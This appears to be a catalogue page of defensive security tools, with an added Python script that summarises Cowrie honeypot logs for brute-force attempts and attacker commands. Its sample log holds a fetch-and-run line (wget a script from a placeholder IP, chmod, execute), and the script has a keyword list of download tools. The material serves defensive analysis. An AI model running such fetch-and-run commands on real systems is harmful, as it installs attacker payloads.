  • AlienVault OSSIM

    AlienVault OSSIM is a feature-rich, open-source security information and event management (SIEM) platform that includes event collection, normalization, and correlation.

  • Cowrie

    Cowrie is a medium-interaction SSH and Telnet honeypot designed to log brute-force attacks and the shell interaction performed by an attacker. Each event (connection, login attempt, command, file download) is written as structured JSON, which makes the logs easy to feed into a SIEM or to summarize directly.
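    As an added example (not code from the original page or from the Cowrie project), the script below summarizes a Cowrie JSON log: which source IPs are brute-forcing, which credentials they try most, which logins succeeded, and which sessions ran commands that fetch a payload. It assumes Cowrie's default JSON output, one event per line, with event IDs such as cowrie.login.failed, cowrie.login.success and cowrie.command.input; the log lines embedded in it are constructed for illustration, not a real capture, and the download markers list is a simple heuristic of my own.

```python
"""Summarize a Cowrie JSON log: brute-force credentials and attacker commands."""
import json
from collections import Counter, defaultdict

# Constructed sample of cowrie.json lines (illustrative, not a real capture).
# Field names follow Cowrie's JSON output; the IPs are documentation ranges.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "protocol": "ssh", "timestamp": "2024-05-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "admin", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:02.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:03.000000Z"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:05.000000Z"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://203.0.113.5/x.sh; chmod +x x.sh; ./x.sh", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:09.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "duration": 12.4, "timestamp": "2024-05-01T10:00:12.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "203.0.113.9", "session": "0f0f0f0f0f0f", "timestamp": "2024-05-01T10:05:00.000000Z"}
this line is truncated garbage and must be skipped, not crash the parser
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.9", "session": "0f0f0f0f0f0f", "timestamp": "2024-05-01T10:05:01.000000Z"}
"""

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}
# Heuristic (my assumption, not a Cowrie feature): commands that pull a payload.
DOWNLOAD_MARKERS = ("wget ", "curl ", "tftp ", "ftpget ")


def parse_events(text):
    """Parse newline-delimited JSON, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # rotated or truncated lines are tolerated, not fatal
        if isinstance(event, dict) and "eventid" in event:
            events.append(event)
    return events


def summarize(events):
    """Aggregate login attempts, credentials, successes and per-session commands."""
    attempts_by_ip = Counter()
    credentials = Counter()
    successes = []
    commands = defaultdict(list)
    for ev in events:
        eid = ev.get("eventid")
        if eid in LOGIN_EVENTS:
            src = ev.get("src_ip", "?")
            cred = (ev.get("username", ""), ev.get("password", ""))
            attempts_by_ip[src] += 1
            credentials[cred] += 1
            if eid == "cowrie.login.success":
                successes.append((src,) + cred)
        elif eid == "cowrie.command.input":
            commands[ev.get("session", "?")].append(ev.get("input", ""))
    # Sessions where any command contains a download marker.
    download_sessions = sorted(
        sess for sess, cmds in commands.items()
        if any(marker in cmd for cmd in cmds for marker in DOWNLOAD_MARKERS)
    )
    return {
        "login_attempts": dict(attempts_by_ip),      # src_ip -> attempts
        "top_credentials": credentials.most_common(5),
        "successful_logins": successes,              # (src_ip, user, password)
        "commands": dict(commands),                  # session -> [commands]
        "download_sessions": download_sessions,
    }


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_LOG))
    print(json.dumps(summary, indent=2, default=list))
```

    On a real deployment, point parse_events at the contents of Cowrie's cowrie.json and the same summary gives you a per-day view of the credential lists being sprayed and of the sessions worth examining by hand (the ones in download_sessions, where the attacker fetched something after logging in).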

  • FIR

    Fast Incident Response. FIR is an open-source cybersecurity incident management and tracking platform designed to help security teams manage and respond to incidents by providing a collaborative environment for information sharing, analysis, and documentation of each case.

  • GRR Rapid Response

    GRR Rapid Response: remote live forensics for incident response.

  • Hunting ELK

    The Hunting ELK, or simply the HELK, is one of the first open-source hunt platforms with advanced analytics capabilities such as a declarative SQL query language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark on top of an ELK stack.

  • LogRhythm

    LogRhythm, Inc. is a global security intelligence company that specializes in Security Information and Event Management (SIEM), log management, network monitoring, user behavior and security analytics.

  • MSTICPy

    Microsoft Threat Intelligence Python Security Tools. MSTICPy is a set of Python tools intended for security investigations and hunting. Many of the tools originated as code in Jupyter notebooks written to solve a problem during a security investigation.

  • osquery

    osquery is an open-source endpoint instrumentation tool that exposes the operating system as a set of SQL tables (running processes, listening ports, users, file hashes, and so on) which can be queried interactively with osqueryi or on a schedule with osqueryd. It is commonly used for security monitoring, compliance, and investigations on Linux, macOS, and Windows.

  • OSSEC:HIDS

    OSSEC is an open-source host-based intrusion detection system (HIDS) that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting, and active response.

  • RockNSM

    RockNSM (Response Operation Collection Kit) is an open-source network security monitoring (NSM) platform built from tools such as Zeek, Suricata, and Stenographer for traffic analysis and full-packet capture, with the Elastic stack for storing and searching the resulting logs. It gives analysts the network visibility needed for threat detection and incident response.

  • ScoutSuite

    Multi-cloud security auditing tool. ScoutSuite, from NCC Group, uses the cloud providers' own APIs to collect the configuration of an account (AWS, Azure, Google Cloud, and others) and produces an offline HTML report that highlights risky settings for manual review.

  • Splunk

    Splunk is a commercial software platform that indexes, searches, analyzes, and visualizes machine-generated data from many sources, and is widely deployed as a SIEM.